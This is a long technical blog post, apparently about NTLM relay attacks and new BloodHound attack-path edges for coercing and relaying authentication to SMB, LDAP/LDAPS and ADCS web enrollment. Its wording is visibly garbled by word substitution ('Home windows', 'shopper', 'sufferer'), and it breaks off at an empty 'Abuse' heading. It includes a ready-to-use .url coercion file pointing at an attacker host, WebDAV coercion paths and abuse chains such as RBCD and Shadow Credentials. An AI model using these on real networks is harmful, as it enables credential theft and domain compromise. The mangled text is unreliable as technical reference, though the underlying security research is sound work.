NTLM relay assaults have been round for a very long time. Whereas many safety practitioners assume NTLM relay is a solved drawback, or at the least a not-so-severe one, it’s, in actual fact, alive and kicking and arguably worse than ever earlier than. Relay assaults are the simplest solution to compromise domain-joined hosts these days, paving a path for lateral motion and privilege escalation.
NTLM relay assaults are extra difficult than many individuals notice. There are lots of shifting elements that operators have to trace utilizing totally different instruments, however we’ve not too long ago launched NTLM relay edges into BloodHound that can assist you carry on pondering in graphs with new edges that characterize coercion and relay assaults in opposition to domain-joined computer systems, originating from Authenticated Customers and main into the pc that may very well be compromised by way of SMB, LDAP/LDAPS, and ADCS ESC8. Every of those edges consists of various parts and conditions, however all of them comply with the identical “Zero to Hero” sample from Authenticated Customers to the would-be compromised pc.
Whereas there are a lot of nice sources on this previous assault, I wished to consolidate all the things it is advisable learn about NTLM right into a single publish, permitting it to be so long as wanted, and I hope everybody will be capable to be taught one thing new.
As soon as Upon a Time
NTLM is a legacy authentication protocol that Microsoft launched in 1993 because the successor to LAN Supervisor. NTLM actually stands for New Know-how LAN Supervisor, a reputation that didn’t age nicely. Whereas Kerberos is the popular authentication protocol in Energetic Listing environments (and past), NTLM remains to be broadly used each time Kerberos isn’t viable or, extra generally, when NTLM utilization is hard-coded.
NTLM Fundamentals
My favourite analysis space is authentication protocols, and through the years, I’ve seen that each authentication protocol is designed to thwart one or two main threats. For NTLM, I imagine it’s replay assaults. Not relay assaults (clearly, given the title), however replay assaults, the place an attacker intercepts a legitimate authentication alternate and replays the packets/messages later to impersonate the sufferer. NTLM prevents such assaults utilizing a challenge-response alternate: the server generates a random problem, and the shopper produces a cryptographic response that proves possession of the shopper’s credentials.
The NTLM authentication alternate entails a three-message alternate:
The Negotiate (sort 1) message is shipped from the shopper to the server to provoke authentication and negotiate session capabilities, similar to a session key alternate and signing (extra on these later), by a set of flags indicating the shopper’s supported/most popular safety attributes for the session.
The Problem (sort 2) message is shipped from the server to the shopper. It comprises a corresponding set of flags indicating the server’s supported/most popular session capabilities and an 8-byte randomly generated nonce, often known as the server problem.
The Authenticate (sort 3) message is shipped from the shopper to the server. It comprises a set of flags indicating the decided session capabilities based mostly on the shopper’s and server’s preferences and a cryptographically generated response to the server problem. There are two main NTLM response technology algorithm variations: NTLMv1 and NTLMv2.
The server then validates the response to authenticate the shopper. Native accounts are validated in opposition to the NT hashes saved within the native SAM, and area accounts are despatched to a site controller for validation by way of the Netlogon protocol.
NTLMv1
NTLMv1 is the unique response algorithm. It was developed in 1993, within the unlucky days when DES was the usual encryption algorithm, in order that’s what Microsoft used to generate the response, as described within the diagram beneath:
As proven above, the shopper’s password is reworked into an NT hash, which is the MD4 hash of the Unicode-encoded password, for use because the DES encryption key. Nonetheless, there was a little bit hiccup: the NT hash was 16 bytes, whereas the efficient DES key size was 7 bytes. Microsoft got here up with a inventive answer — cut up the NT hash into three keys: the primary seven bytes, the next seven bytes, and the final two bytes padded with zeros. Every of those keys encrypts the server problem thrice independently, and the ciphertexts are concatenated to supply a 24-byte-long response.
NTLMv1 is Unhealthy
NTLMv1 turned out to be a nasty concept for 3 most important causes:
- First, DES encryption is… not nice, as it may be cracked comparatively simply.
- Second, the response isn’t “salted”, that means that the identical password and server-challenge mixture at all times produces the identical response, making it vulnerable to rainbow desk assaults.
- Third, combining the 2 earlier causes makes one in all my all-time favourite assaults, found by Moxie Marlinspike and David Hulton. They managed to recuperate the uncooked NT hash by cracking every of the three ciphertexts individually, utilizing rainbow tables and customized {hardware}. Why ought to we care concerning the NT hash? In spite of everything, it’s not a password, proper? We’ll focus on the notorious Go the Hash assault quickly.
“NTLM2” Precedes NTLMv2
Only for completeness, I’ll point out “NTLM2”, also called “NTLM2 Session Response” or “NTLMv1 with Enhanced Session Safety”. This interim model between NTLMv1 and NTLMv2 launched an 8-byte client-generated nonce, often known as the shopper problem. The shopper problem was concatenated with the server problem, after which the mixed worth was MD5-hashed and, lastly, DES-encrypted as in NTLMv1. This enhancement ensured each response was distinctive and thwarted rainbow desk assaults. Nonetheless, the algorithm remains to be basically flawed, and the NT hash will be recovered with trendy GPUs inside lower than 24 hours, on common, at a value of about $30.
NTLM2 is only a distraction, although. Be happy to overlook you ever learn the paragraph above.
NTLMv2
Shortly after, nonetheless within the ’90s, Microsoft launched NTLMv2, changing DES encryption with HMAC-MD5, as described beneath. This algorithm remains to be in use at the moment.
The NT hash is used as the important thing to generate an HMAC of the shopper’s area identify and username. It’s referred to as the “NT One Manner Perform v2” or NTOWFv2. The NTOWFv2 HMAC worth is then used as the important thing to generate one other HMAC, this time of the server problem, together with extra data, similar to a random shopper problem and a timestamp to thwart rainbow desk assaults, and extra session attributes, which we’ll focus on later. This HMAC worth is the NT Proof String or NTProofStr. Many individuals mistakenly assume that the NTProofStr is the NTLMv2 response, however it’s only a part of it. All the extra data used to generate the NTProofStr can be included within the NTLMv2 response to permit the server to generate the identical HMAC and validate the shopper’s response.
LM Compatibility Stage
Each Home windows host acts as each a server, when somebody authenticates to it, and a shopper, when it authenticates to a different host. A single registry worth controls each the server and shopper NTLM model assist, positioned at HKLMSystemCurrentControlSetControlLsaLmCompatibilityLevel. It permits enabling/disabling NTLMv1 and NTLMv2 for your complete host as a server and as a shopper, as described within the desk beneath:
| Worth | Consumer NTLMv1 | Consumer NTLMv2 | Server NTLMv1 | Server NTLMv2 |
|-------|---------------|---------------|---------------|---------------|
| 0 | Enabled | Disabled | Enabled | Enabled |
| 1 | Enabled | Disabled | Enabled | Enabled |
| 2 | Enabled | Disabled | Enabled | Enabled |
| 3 * | Disabled | Disabled | Enabled | Enabled |
| 4 | Disabled | Enabled | Enabled | Enabled |
| 5 | Disabled | Enabled | Disabled | Enabled |* Default as of Home windows 2008/Vista
When a shopper authenticates to a member server utilizing a site account, the server sends the response to a DC for validation. Subsequently, the DC’s LmCompatibilityLevel is the one which determines whether or not NTLMv1 is accepted or not. Notice that totally different DCs can technically have totally different configurations. Nonetheless, it is extremely unusual to see DCs with LmCompatibilityLevel set to five (I’ve by no means seen that outdoors of lab environments), so it’s secure to imagine the DC will assist each NTLMv1 and NTLMv2, as a server, for area accounts.
It isn’t unusual to see DCs with a decrease LmCompatibilityLevel. I imagine the reason being that some sysadmins mistakenly assume {that a} decrease LmCompatibilityLevel is required to assist NTLMv1 purchasers within the area, whereas, in actual fact, they only allow NTLMv1 on the DCs as purchasers, which may have dire penalties, as we’ll clarify quickly.
Wanting on the desk above, we will make a couple of observations:
- As a shopper, a Home windows host can have both NTLMv1 or NTLMv2 enabled however not each.
- As a server, a Home windows host will seemingly allow each NTLMv1 and NTLMv2.
- If a Home windows host permits NTLMv1 as a shopper, it should additionally allow it as a server.
- A Home windows host doesn’t must allow NTLMv1 as a shopper to allow it as a server.
Further settings permit limiting or auditing outgoing or incoming NTLM authentication or requiring session safety settings, however we received’t elaborate on these.
Password Cracking is a Downside
There are totally different instruments for capturing NTLM responses for cracking. Responder is essentially the most well-known and broadly used device, however Inveigh and Farmer deserve an honorable point out, too.
An attacker can doubtlessly crack a captured NTLM alternate, whether or not it’s NTLMv1 or NTLMv2, to recuperate the password if it isn’t sufficiently sturdy. Within the case of NTLMv1, the NT hash can at all times be recovered, and it may be abused in a few methods. Whether it is a pc/service account, the attacker can forge an RC4-encrypted Kerberos silver ticket and impersonate a privileged account to the host or the service. The NT hash may also be used for NTLM authentication, with out cracking the cleartext password, by the notorious Go the Hash assault.
Go the Hash
When taking a more in-depth have a look at the NTLMv1 and NTLMv2 flows, it’s possible you’ll discover that, technically, we don’t want the cleartext password to supply a legitimate NTLM response. If we skip step one within the circulation, the NT hash is all we want.
Who Must Crack Passwords Anyway?
The actual drawback with NTLM is relay assaults. An attacker can merely relay the NTLM messages between a shopper and server, forwards and backwards, till the server establishes a session for the shopper, permitting the attacker to carry out any operation the shopper may carry out on the server. For readability, we’ll discuss with the shopper because the “sufferer” and the server because the “goal”.
Relay assaults permit authenticating because the sufferer to the goal with out spending time and sources on password cracking and with out relying on weak passwords.
Not an Opportunistic Assault
Some defenders belittle relay assaults as a result of they appear to be considerably opportunistic. Nonetheless, relay assaults will be executed with intention and precision when mixed with authentication coercion assaults.
Usually, the mechanics of pc account authentication coercion and consumer account authentication coercion are totally different.
Laptop Account Authentication Coercion
Laptop account authentication coercion usually entails an RPC name to a susceptible perform on a distant host (the relay sufferer). Particularly, we’d attempt to name a perform that may try and entry an arbitrary path we will management. Then, when the distant service makes an attempt to entry the required path, we’d require authentication and kick off a relay assault. The distant service would authenticate because the relay sufferer pc account if the service runs as SYSTEM or NETWORK SERVICE and if it doesn’t impersonate a unique context earlier than making an attempt to entry the useful resource.
The 2 most notable pc authentication coercion primitives are the Printer Bug and PetitPotam. The Printer Bug abuses the perform RpcRemoteFindFirstPrinterChangeNotification[Ex] within the Print Spooler service, which establishes a connection to an arbitrary path to ship notifications about print object standing modifications. PetitPotam abuses a number of features within the Encrypting File System (EFS) service, similar to EfsRpcOpenFileRaw, which opens a file in an arbitrary path for backup/restore. These strategies lead to a right away authentication try from the sufferer pc account with out consumer interplay.
Authenticated Customers are permitted to set off these pc account authentication coercion assault primitives, permitting virtually anybody to provoke the relay assault.
Person Account Authentication Coercion
Person account authentication coercion is extra difficult and, in some instances, considerably opportunistic. The traditional consumer account authentication coercion primitives contain planting a reference to an exterior useful resource in a doc, electronic mail, or perhaps a internet web page. When the sufferer renders the doc, the shopper makes an attempt to load the useful resource, generally with out their data or consent, and initiates an authentication try with the consumer’s credentials. These primitives require one to a few clicks and will be despatched on to the sufferer or strategically planted in a heavy-traffic shared folder or web site for a watering gap assault.
Dominic Chell highlighted a extra refined, well-known method that abuses Home windows Shell. Home windows Shell is the working system’s consumer interface. It has extensions and handlers that enrich the consumer expertise, for instance, by producing thumbnails/previews or customizing icons. Specifically crafted information can manipulate these mechanisms to entry arbitrary paths as quickly because the working system “sees” them, with none consumer interplay. The most typical solution to abuse it’s to move to the icon handler a reference to an attacker-controlled path, which might lead to a consumer authentication try as quickly because the consumer browses the folder through which the file is positioned, even when the consumer doesn’t even click on or spotlight the file. Essentially the most notable file varieties that assist this sort of manipulation are:
- Home windows Search Connectors (.searchConnector-ms)
- URL information (.url)
- Home windows Shortcuts (.lnk)
- Home windows Library Recordsdata (.library-ms)
For instance, the next URL file would attempt to load its icon from the trail attackerhosticonsurl.icon from the consumer’s safety context, so it authenticates with the consumer’s credentials.
[InternetShortcut]
URL=attacker
WorkingDirectory=attacker
IconFile=attackerhosticonsurl.icon
IconIndex=1
Attackers can drop these information in strategic file shares, similar to high-traffic file shares or these steadily utilized by privileged customers, after which kick off a relay assault as quickly as an authentication try comes by.
Credential Abuse With out Lateral Motion
Historically, when attackers achieve admin entry to a bunch with an fascinating logged-on consumer, they’d transfer laterally to that host after which try one in all many credential abuse strategies to impersonate the consumer and proceed maneuvering towards their goals. Nonetheless, as EDRs and different endpoint safety options enhance, the detection danger of lateral motion and credential abuse TTPs will increase.
As an alternative, attackers can cut back the detection danger by accessing the distant file system by way of an administrative share, similar to C$, and dropping an authentication coercion file on the logged-on consumer’s desktop. The second the file is dropped, Home windows Shell begins processing it, and an authentication try and the attacker-controlled host is initiated. It really works even when the file is hidden, the workstation is locked, or the RDP session is disconnected. Extra particularly, it really works so long as explorer.exe runs in an acceptable safety context, that means it’s related to a logon session with credentials cached within the MSV1_0 authentication bundle.
The attacker can attempt to crack the NTLM response to recuperate the password or set up a session on a goal server by relaying it.
Taking Over 445
In case you missed it, it’s potential to bind a listener to port 445 on Home windows hosts with out loading a driver, loading a module into LSASS, or requiring a reboot of the Home windows machine, as Nick Powers found final yr.
Too Good to Be True?
Up to now, NTLM relay assaults could seem very highly effective and considerably easy. Nonetheless, through the years, Microsoft launched a number of mitigations to complicate issues.
Session Safety
NTLM helps signing (integrity) and sealing (encryption/confidentiality) to safe the session. It’s achieved by exchanging a session key within the NTLM Authenticate message. The shopper generates a session key and RC4-encrypts it utilizing a key generated, partially, from the shopper’s NT hash. A standard misunderstanding is that when signing is negotiated, NTLM relay assaults fail to ascertain a session (authenticate). Nonetheless, even with signing, authentication is profitable. The issue is that the attacker can’t recuperate the session key with out possessing both the sufferer’s NT hash or the goal’s credentials. But when the attacker possessed both of them, there can be no want for relaying anyway. Subsequently, if the goal certainly requires all the following messages within the session to be signed with the session key, the attacker wouldn’t be capable to use the session. Fortunately for the attackers, not all servers implement such a requirement, as we’ll see quickly.
The screenshot beneath reveals a portion of a typical NTLM Authenticate message through which a session secret is exchanged and signing is negotiated.
The premise of an NTLM relay assault is a man-in-the-middle place. Subsequently, the attacker’s apparent subsequent step ought to be tampering with this Authenticate message in flight to take away the session key and reset the Negotiate Key Change and Negotiate Signal flags, pretending the sufferer by no means negotiated these.
Message Integrity Code (MIC)
Microsoft anticipated such makes an attempt and launched an integrity test to the NTLM messages. An HMAC is added to the Authenticate message to guard all three NTLM messages with the session key. The server validates the MIC upon receiving the message, and if a single bit in any of the three NTLM messages is flipped, authentication fails.
Drop the MIC?
The MIC is a later addition to the NTLM protocol. Home windows XP and Home windows Server 2003 and older, in addition to some third celebration platforms, don’t assist it. So, can’t the attacker drop the MIC and fake the shopper by no means added it?
Microsoft anticipated that, too, and added an attribute to the NTLMv2 response indicating the MIC’s presence.
Subsequently, an attacker must take away/reset that attribute earlier than eradicating the MIC, however as a result of this attribute is a part of the NTLMv2 response, altering it might invalidate the NTProofStr, and authentication would fail.
These of you who’re paying consideration ought to notice that NTLMv1 doesn’t incorporate any extra data into the NTLMv1 response, that means that NTLMv1 is at all times vulnerable to MIC elimination and tampering with the Negotiate flags and the session key.
A Blast From the Previous
In 2019, Yaron Zinar and Marina Simakov found a few vulnerabilities within the NTLM implementation, permitting attackers to Drop the MIC even in NTLMv2. Nonetheless, we won’t delve into these as a result of Microsoft launched patches, and this can be very uncommon to come across Home windows hosts affected by these vulnerabilities these days.
Channel Binding
Channel binding, additionally generally known as Prolonged Safety for Authentication (EPA), is a mechanism that forestalls man-in-the-middle assaults by incorporating a token from the safe channel (TLS), that’s, the server certificates hash, into the NTLM Authenticate message. The server can examine the channel binding token to its personal certificates hash and reject the authentication try if there’s a mismatch. Any service operating over TLS, similar to HTTPS and LDAPS, can assist channel binding.
Similar to session safety and the MIC, channel binding will not be necessary, however it’s a part of the NTLMv2 response, and subsequently, it’s protected by the NTProofStr, so the attacker can’t take away it and fake it was by no means there. Nonetheless, NTLMv1 doesn’t assist channel binding.
Backward Compatibility
All these mitigations are later additions to the protocol, so some older or third celebration platforms could not assist them. Subsequently, they will not be required by the goal server. The server conduct relies on its configuration, whether or not it’s configured to assist and even require session safety or channel binding, and whether or not it’s designed or applied to honor the session capabilities negotiated within the NTLM alternate. On condition that that is simply concerning the midpoint of this publish, you possibly can assume it isn’t unusual for targets to not require or implement these mitigations.
Protected Customers
Microsoft launched the Protected Customers safety group within the Home windows Server 2012R2 practical stage to mitigate a number of assaults that may result in credential materials theft. Members of this group are usually not permitted to carry out NTLM, and hosts operating Home windows Server 2012R2/Home windows 8.1 or later don’t cache the NT hash in LSA reminiscence. These protections and others could have usability points, so solely privileged/delicate accounts ought to be added to this group. Sadly, this group is simply too usually left empty.
Not Too Good to Be True
Given all the things mentioned above, what are the circumstances for relay assaults?
A relay assault ought to be viable if the goal doesn’t assist these mitigations by design/implementation or configuration (disabled) or the goal helps these mitigations (enabled) however doesn’t require them, and one of many following applies:
- The sufferer doesn’t negotiate session safety and channel binding
- The sufferer’s session negotiation is unprotected (NTLMv1)
- The goal implementation ignores the negotiated capabilities
Relaying is barely half the story, although. A profitable relay satisfies authentication and establishes a session. Nonetheless, authorization, that means what the attacker can do afterward, relies on the sufferer’s permissions.
Focusing on SMB
The primary and easiest situation we launched into BloodHound is relaying NTLM to SMB. SMB servers don’t assist channel binding with NTLM, and so they negotiate signing on the SMB protocol stage, outdoors the NTLM alternate, that means that even when the sufferer negotiates signing within the NTLM Authenticate message, the goal will disregard it and solely contemplate what’s negotiated within the SMB headers, which the attacker can management. To be clear, configuring SMB purchasers to require SMB signing doesn’t have an effect on NTLM relay assaults.
Under is an excerpt from a typical SMB2 negotiate response message with SMB signing enabled however not required. The server is susceptible to relay assaults if the signing required bit will not be set.
Area controllers beginning with Home windows Server 2008 and all Home windows hosts beginning with Home windows Server 2025 and Home windows 11 require SMB signing by default. In observe, it implies that these days, most Home windows hosts on the market, particularly Home windows servers, don’t require SMB signing by default. Sadly, many organizations don’t change these defaults for the unjustified worry of backward compatibility or a fantasy about efficiency affect.
Introducing the CoerceAndRelayNTLMToSMB Edge
The brand new CoerceAndRelayNTLMToSMB edge is the only of the brand new NTLM relay edges. The sting at all times comes out of the Authenticated Customers node and leads into the goal pc node. It represents a mix of pc account authentication coercion in opposition to the relay sufferer and an NTLM relay assault in opposition to the relay goal.
Assortment
SharpHound collects all of the required data as follows:
- SMB signing standing assortment doesn’t require authentication. It’s collected from the relay goal by actively establishing a reference to the host over SMB and parsing the SMB negotiation response messages.
- Native admin rights are collected from the relay goal. They are often collected from the host immediately over RPC, which can or could not require admin rights, relying on the OS model and configuration, or from the DC by way of GPO evaluation.
- Outgoing NTLM restriction is collected from the relay sufferer by way of WMI or Distant Registry, which requires admin rights.
Edge Creation
BloodHound creates the sting if the next standards are met:
- SMB signing on the goal pc will not be required — that is the relay goal. The sting won’t be created if the SMB signing standing will not be collected/ingested into BloodHound.
- No less than one pc account within the surroundings has native admin entry to the goal pc — that is the relay sufferer.
- There isn’t a outgoing NTLM restriction on the sufferer host. In BloodHound Neighborhood Version, if this knowledge wasn’t collected/ingested, will probably be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption will not be made, and the sting won’t be created.
- If the area practical stage is Home windows Server 2012R2, the relay sufferer should not be a member of the Protected Customers group.
The sting is at all times created from Authenticated Customers to the pc node representing the relay goal.
Increasing the Coercion Targets accordion lists the relay victims, and increasing the Composition view reveals a visible illustration.
Abuse
An attacker can traverse this edge to realize entry to the C$ or ADMIN$ share on the relay goal, dump LSA secrets and techniques from Distant Registry, together with the pc account password, or transfer laterally by way of the Service Management Supervisor.
A quite common situation captured by this new edge is SCCM TAKEOVER 2, coercing authentication from the SCCM web site server and relaying it to the SCCM database server to take over your complete hierarchy.
SMB-Particular Limitations
The CoerceAndRelayNTLMToSMB edge solely covers eventualities through which a pc (sufferer) has admin entry to a different pc (goal) that doesn’t require SMB signing. It doesn’t cowl consumer accounts because the relay sufferer, and it doesn’t cowl entry to sources {that a} relay sufferer would possibly be capable to entry by way of SMB with out admin rights, similar to non-administrative file shares.
Different limitations that apply to all new NTLM relay edges will likely be mentioned later.
Focusing on ADCS (ESC8)
The brand new CoerceAndRelayNTLMToADCS edge is way more difficult than relaying to SMB as a result of certificates abuse has lots of necessities. Nonetheless, the relaying logic remains to be comparatively easy. Relaying to ADCS internet enrollment permits acquiring a certificates for the relay sufferer and utilizing it for authentication to impersonate the sufferer. That is the notorious ADCS ESC8 that Will Schroeder and Lee Chagolla-Christensen disclosed of their Licensed Pre-Owned white paper.
The ADCS Certificates Authority Internet Enrollment endpoint and Certificates Enrollment Internet Service run on IIS. IIS doesn’t assist session safety, nevertheless it does assist Prolonged Safety for Authentication (EPA), also called channel binding. EPA is supported over HTTPS, however not HTTP as a result of HTTP has no safe channel to bind. So, if internet enrollment is on the market over HTTP or over HTTPS with EPA disabled, then relay is viable. That is the default configuration on Home windows Server 2022 and older, however now not the default on Home windows Server 2025. Notice that it applies to any web site served on IIS with NTLM authentication, not simply ADCS internet enrollment.
As talked about, relaying is all about authentication. As soon as authenticated, the attacker can do regardless of the relay sufferer is permitted to do. This assault is viable provided that the relay sufferer is permitted to enroll a shopper authentication certificates (requires EKUs that permit performing Kerberos PKINIT authentication or Schannel authentication to LDAP) and the CA is trusted by the area controller and added to the area’s NTAuthCertificates. Jonas Bülow Knudsen explains these necessities intimately in this weblog publish.
Introducing the CoerceAndRelayNTLMToADCS Edge
The brand new CoerceAndRelayNTLMToADCS edge comes out of the Authenticated Customers node and leads into the sufferer pc node, in contrast to CoerceAndRelayNTLMToSMB, which leads into the relay goal pc node. The explanation for the distinction is that the assault compromises the relay sufferer slightly than the relay goal.
Assortment
SharpHound collects all of the required data as follows:
- Connect with the ADCS enrollment endpoints and try and carry out NTLM authentication with and with out EPA to find out if it’s enabled, required, or disabled. This may be collected with out admin entry.
- All of the ADCS certificates enrollment necessities are collected by way of LDAP, as finished for all current ADCS edges. This may be collected with out admin entry.
- Outgoing NTLM restriction is collected from the relay sufferer by way of WMI or Distant Registry, which requires admin rights.
Edge Creation
BloodHound creates the sting if the next standards are met:
- The relay sufferer is a pc permitted to enroll a certificates with a template that meets the necessities listed beneath. The relay sufferer should have the enroll permission on the enterprise CA and the certificates template.
- The certificates template has (1) EKUs that allow PKINIT/Schannel authentication, (2) supervisor approval disabled, and (3) no approved signatures required.
- The enterprise CA is trusted for NT authentication, and its certificates chain is trusted by the area controller.
- The enterprise CA printed the certificates template.
- The enterprise CA that printed the certificates has an internet enrollment endpoint out there over HTTP or HTTPS with EPA disabled.
- There isn’t a outgoing NTLM restriction on the sufferer host. In BloodHound Neighborhood Version, if this knowledge wasn’t collected/ingested, will probably be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption will not be made, and the sting won’t be created.
- If the area practical stage is Home windows Server 2012R2, the relay sufferer should not be a member of the Protected Customers group.
The sting is at all times created from Authenticated Customers to the pc node representing the relay sufferer.
Increasing the composition view reveals all of the parts concerned, together with the certificates template and enterprise CA to goal.
Abuse
After enrolling a certificates, the attacker can carry out PKINIT authentication as the pc account utilizing Rubeus to acquire a Kerberos Ticket Granting Ticket (TGT) and even the NT hash for the pc account by the UnPAC the Hash assault. With these, the attacker can compromise the relay sufferer host by way of S4U2Self abuse or a silver ticket, or use the TGT or the NT hash to entry any useful resource that the pc account is permitted to entry.
If the CA is vulnerable to relay assaults, all of the computer systems that may enroll an acceptable certificates are uncovered. Notice that the default “Machine” certificates template meets the above standards and exposes all of the computer systems within the area.
ADCS-Particular Limitations
The CoerceAndRelayNTLMToADCS edge solely covers eventualities through which a pc (sufferer) can enroll a site authentication certificates and the certificates authority internet enrollment (goal) that’s susceptible to relay assaults. It doesn’t cowl consumer accounts because the relay sufferer, and it doesn’t cowl certificates templates incompatible with area authentication.
Different limitations that apply to all new NTLM relay edges will likely be mentioned later.
Focusing on LDAP or LDAPS
The brand new CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges are by much more difficult to abuse. In contrast to SMB and IIS, LDAP servers are applied to require the capabilities negotiated with the shopper within the NTLM alternate, that means that if the shopper negotiates session safety with signing, the LDAP server would require all the following messages within the session to be signed with the session key.
Laptop account authentication coercion can set off authentication from the SMB shopper, however the SMB shopper at all times negotiates session safety with signing within the NTLM Authenticate message, so SMB can’t be relayed to LDAP. The exception to this rule is purchasers which have NTLMv1 enabled as a result of, in NTLMv1, the MIC will be dropped, and the Negotiate Signal flag will be reset.
However that’s not a useless finish. Some authentication coercion primitives, together with the Printer Bug and PetitPotam, settle for WebDAV paths just by including the at signal adopted by a port quantity to the hostname, e.g., “attackerhost@80iconsurl.icon”.
WebDAV is encapsulated in HTTP messages despatched by the Internet Consumer service, which doesn’t negotiate signing and is, subsequently, suitable with relaying to LDAP. Nonetheless, by default, the Internet Consumer would solely authenticate to targets within the Intranet Zone, as per the default Web Settings.
Getting within the (Intranet) Zone
HTTP purchasers in Home windows ought to name the MapUrlToZoneEx2 perform to find out which zone a given URL belongs to. The perform determines {that a} URL maps to the Intranet Zone based mostly on the next guidelines:
- Direct Mapping: URLs manually added to the Intranet Zone
- The PlainHostName Rule (aka “The Dot Rule”): If the URL’s hostname doesn’t comprise any dots
- Fastened Proxy Record Bypass: Websites added to the mounted proxy bypass record
- WPAD Proxy Script: URLs for which the proxy script returns “DIRECT”
In the event you use the host’s “shortname” (the hostname portion of the FQDN, e.g., hostname.contoso.native) or NetBIOS identify, the underlying identify decision mechanisms will resolve the identify to an IP deal with, despite the fact that the URL is “dot-less”, as a result of DNS mechanically appends a suffix based mostly on the shopper’s DNS search record, which is often configured by way of DHCP or GPO.
However how can we get DNS decision for our attacker-controlled host?
Deliver Your Personal DNS File
By default, Energetic Listing Built-in DNS permits all Authenticated Customers to create DNS information by way of LDAP or Dynamic DNS (DDNS), as mentioned in this weblog publish by Kevin Robertson, and will be finished along with his instruments Powermad and Sharpmad.
WebDAV Is a Hit or Miss
Authentication coercion can set off WebDAV site visitors provided that the Internet Consumer service is put in on the host, which it’s by default on Home windows desktops however requires the Desktop Expertise or the WebDAV Redirector characteristic on Home windows servers. Even whether it is put in, it additionally must be operating, which isn’t the default on desktops. Most consumer account authentication coercion primitives will automagically set off the Internet Consumer service to begin. Nonetheless, pc accounts are extra tough. Whereas most pc account authentication coercion primitives assist WebDAV paths, they won’t begin the Internet Consumer service. Subsequently, once we goal pc accounts, which is what we do right here, we’re restricted to computer systems that at present have the Internet Consumer service already operating.
When the Internet Consumer service begins, it opens a named pipe referred to as DAV RPC SERVICE, so we will decide whether or not it’s operating remotely with out admin rights.
One essential factor to notice is that when the Internet Consumer service runs, it impacts all processes operating on the host in any context, not simply the consumer who began it. Subsequently, if we set off the service to begin by way of consumer account authentication coercion, for instance, by dropping an authentication coercion file into a heavy-traffic shared folder, any consumer that browses the share doubtlessly exposes the host they logged in on to NTLM relay to LDAP.
LDAP Relay Mitigations
LDAP servers assist mitigating relay assaults with LDAP signing and LDAP channel binding. Every will be configured individually, and each have to be enforced to forestall relay assaults. If both one isn’t, there’s a bypass:
- If LDAP signing is required and LDAP channel binding is disabled, the attacker can relay to LDAPS as a substitute of LDAP, and since LDAPS encapsulates the site visitors in a TLS channel, the area controller considers the signing requirement to be met.
- If LDAP channel binding is enforced and LDAP signing is disabled, the attacker can relay to LDAP with StartTLS, as mentioned on this weblog publish, as a result of the TLS channel is established solely post-authentication.
These settings are DC-level settings, not domain-level settings, that means that you could be discover totally different area controllers with totally different configurations in the identical surroundings.
Up till Home windows Server 2025, area controllers didn’t implement these by default, and given that almost all organizations haven’t but modified each of those settings, right now, most area controllers on the market are susceptible to NTLM relay assaults. Nonetheless, as of Home windows Server 2025, area controllers implement encryption (sealing) by way of session safety on LDAP SASL bind by default, and with that new configuration, relaying to LDAP or LDAPS is now not viable. However right now, area controllers operating on Home windows Server 2025 are nonetheless few and much between.
Notice that enabling LDAP shopper signing doesn’t mitigate relay assaults, as we’re not abusing LDAP purchasers; we’re abusing internet purchasers.
Viability Standards
All issues thought of, relaying to LDAP is viable underneath the next circumstances.
For the relay goal, there’s at the least one area controller that:
- Is operating on Home windows Server 2022 or older and doesn’t require LDAP signing or LDAPS turned on with out channel binding.
- Is operating on Home windows Server 2025 with LDAP signing explicitly disabled.
For the relay sufferer, the pc should both have the Internet Consumer put in and operating or have NTLMv1 enabled.
I Efficiently Relayed to LDAP. Now What?
As I reiterated a number of instances, relaying will get you thru the authentication step. What you are able to do with the session afterward relies on the permission of the relay sufferer. A profitable relay to LDAP would mean you can carry out any motion that the relay sufferer is permitted to carry out in Energetic Listing, with one caveat — password change/reset should occur over an encrypted channel, in order that motion is feasible solely when relaying to LDAPS.
On this situation, we coerce and relay a pc account to LDAP or LDAPS. On this case, it is extremely unlikely that the relay sufferer, a pc account, would have excessive privileges within the area. Nonetheless, computer systems are allowed to vary some attributes of their very own pc account, together with:
- msDS-AllowedToActOnBehalfOfOtherIdentity, which might permit taking on the host by way of Useful resource-Based mostly Constrained Delegation (RBCD), as defined intimately on this publish.
- msDS-KeyCredentialLink, which might permit taking on the host by way of the Shadow Credentials assault, as defined intimately on this publish. Notice that a pc account is permitted so as to add a brand new worth to the msDS-KeyCredentialLink attribute as a validated write, provided that there isn’t an current key credential already current. Nonetheless, even when there’s already a key credential current, the pc account is allowed to delete it after which add a brand new one, which might require relaying twice: as soon as for deletion and a second time for the Shadow Credentials assault.
Introducing the CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS Edges
The brand new CoerceAndRelayNTLMToLDAP and CoerceAndRelayNTLMToLDAPS edges come out of the Authenticated Customers node and lead into the sufferer pc node, similar to the CoerceAndRelayNTLMToADCS edge, as a result of right here, too, the assault compromises the relay sufferer slightly than the relay goal.
Assortment
SharpHound collects all of the required data as follows:
- Connect with the area controllers by way of LDAP and LDAPS and try and carry out NTLM authentication with and with out signing and channel binding to find out in the event that they’re enabled, required, or disabled. This may be collected with out admin entry.
- Connect with the relay sufferer by way of SMB to test whether or not the DAV RPC SERVICE named pipe is open. This may be collected with out admin entry.
- Outgoing NTLM restriction is collected from the relay sufferer by way of WMI or Distant Registry, which requires admin rights.
Edge Creation
BloodHound creates the CoerceAndRelayNTLMToLDAP edge if the next standards are met:
- There’s at the least one area controller operating on Home windows 2022 or older, and LDAP signing is required.
- The relay sufferer has the Internet Consumer service operating.
- There isn’t a outgoing NTLM restriction on the sufferer host. In BloodHound Neighborhood Version, if this knowledge wasn’t collected/ingested, will probably be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption will not be made, and the sting won’t be created.
BloodHound creates the CoerceAndRelayNTLMToLDAPS edge if the next standards are met:
- There’s at the least one area controller operating on Home windows 2022 or older, and LDAPS is on the market with out channel binding required.
- The relay sufferer has the Internet Consumer service operating.
- There isn’t a outgoing NTLM restriction on the sufferer host. In BloodHound Neighborhood Version, if this knowledge wasn’t collected/ingested, will probably be assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption will not be made, and the sting won’t be created.
- If the area practical stage is Home windows Server 2012R2, the relay sufferer should not be a member of the Protected Customers group.
The sting is at all times created from Authenticated Customers to the pc node representing the relay sufferer.
Increasing the Relay Targets part within the data panel lists all of the affected area controllers that may be focused.
Abuse
